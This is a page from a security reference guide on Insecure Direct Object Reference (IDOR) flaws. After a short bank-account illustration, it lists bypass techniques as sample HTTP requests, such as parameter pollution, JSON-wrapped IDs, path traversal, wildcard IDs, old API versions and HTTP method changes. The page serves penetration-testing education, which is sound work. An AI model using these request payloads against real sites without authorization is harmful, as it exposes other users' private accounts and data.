πŸ”
πŸ”
πŸ”
πŸ”
s0cm0nkey's Security Reference Guide
Search…
All of the Best Links and Resources on Cyber Security.
Cyber Intelligence
Red - Offensive Operations
Red - Web App Hacking
Burp Suite
Web App Testing Frameworks
Mapping the Site
Scanning Utilities
Web Technologies
Attacks and Vulnerabilities
Broken Authentication
Business Logic Flaws
Clickjacking
Command Injection
CSRF
Deserialization
HTTP Host Header Attacks
HTTP Request Smuggling
Insecure Direct Object Reference
SQL Injection
Web Cache Poisoning
Web Sockets
XXE - XML External Entity Attacks
XSS Cross-Site Scripting
Blue - Defensive Operations
Blue - DFIR: Digital Forensics and Incident Response
Yellow - NetEng/SysAdmin
Yellow - Code and CLI
Grey - Privacy/TOR/OPSEC
Training and Resources
Powered By GitBook
Insecure Direct Object Reference

Basics

​
​https://owasp.org/www-project-top-ten/2017/A5_2017-Broken_Access_Control.html For example, let's say we're logging into our bank account, and after correctly authenticating ourselves, we get taken to a URL like this https://example.com/bank?account_number=1234. On that page we can see all our important bank details, and a user would do whatever they needed to do and move along their way thinking nothing is wrong. There is however a potentially huge problem here, a hacker may be able to change the account_number parameter to something else like 1235, and if the site is incorrectly configured, then he would have access to someone else's bank information.
​

How to Find

  1. 1.
    Add parameters onto the endpoints for example, if there was
1
GET /api/v1/getuser
2
[...]
Copied!
Try this to bypass
1
GET /api/v1/getuser?id=1234
2
[...]
Copied!
  1. 1.
    HTTP Parameter pollution
1
POST /api/get_profile
2
[...]
3
user_id=hacker_id&user_id=victim_id
Copied!
  1. 1.
    Add .json to the endpoint
1
GET /v2/GetData/1234
2
[...]
Copied!
Try this to bypass
1
GET /v2/GetData/1234.json
2
[...]
Copied!
  1. 1.
    Test on outdated API Versions
1
POST /v2/GetData
2
[...]
3
id=123
Copied!
Try this to bypass
1
POST /v1/GetData
2
[...]
3
id=123
Copied!
  1. 1.
    Wrap the ID with an array.
1
POST /api/get_profile
2
[...]
3
{"user_id":111}
Copied!
Try this to bypass
1
POST /api/get_profile
2
[...]
3
{"id":[111]}
Copied!
  1. 1.
    Wrap the ID with a JSON object
1
POST /api/get_profile
2
[...]
3
{"user_id":111}
Copied!
Try this to bypass
1
POST /api/get_profile
2
[...]
3
{"user_id":{"user_id":111}}
Copied!
  1. 1.
    JSON Parameter Pollution
1
POST /api/get_profile
2
[...]
3
{"user_id":"hacker_id","user_id":"victim_id"}
Copied!
  1. 1.
    Try decode the ID, if the ID encoded using md5,base64,etc
1
GET /GetUser/dmljdGltQG1haWwuY29t
2
[...]
Copied!
dmljdGltQG1haWwuY29t => [email protected]​
  1. 1.
    If the website using graphql, try to find IDOR using graphql!
1
GET /graphql
2
[...]
Copied!
1
GET /graphql.php?query=
2
[...]
Copied!
  1. 1.
    MFLAC (Missing Function Level Access Control)
1
GET /admin/profile
Copied!
Try this to bypass
1
GET /ADMIN/profile
Copied!
  1. 1.
    Try to swap uuid with number
1
GET /file?id=90ri2-xozifke-29ikedaw0d
Copied!
Try this to bypass
1
GET /file?id=302
Copied!
  1. 1.
    Change HTTP Method
1
GET /api/v1/users/profile/111
Copied!
Try this to bypass
1
POST /api/v1/users/profile/111
Copied!
  1. 1.
    Path traversal
1
GET /api/v1/users/profile/victim_id
Copied!
Try this to bypass
1
GET /api/v1/users/profile/my_id/../victim_id
Copied!
  1. 1.
    Change request content type
1
Content-type: application/xml
Copied!
Try this to bypass
1
Content-type: application/json
Copied!
  1. 1.
    Send wildcard instead of ID
1
GET /api/users/111
Copied!
Try this to bypass
1
GET /api/users/*
Copied!
  1. 1.
    Try google dorking to find new endpoint
Reference:
Previous
HTTP Request Smuggling
Next
SQL Injection
Last modified 7mo ago
Copy link
Contents
Basics
How to Find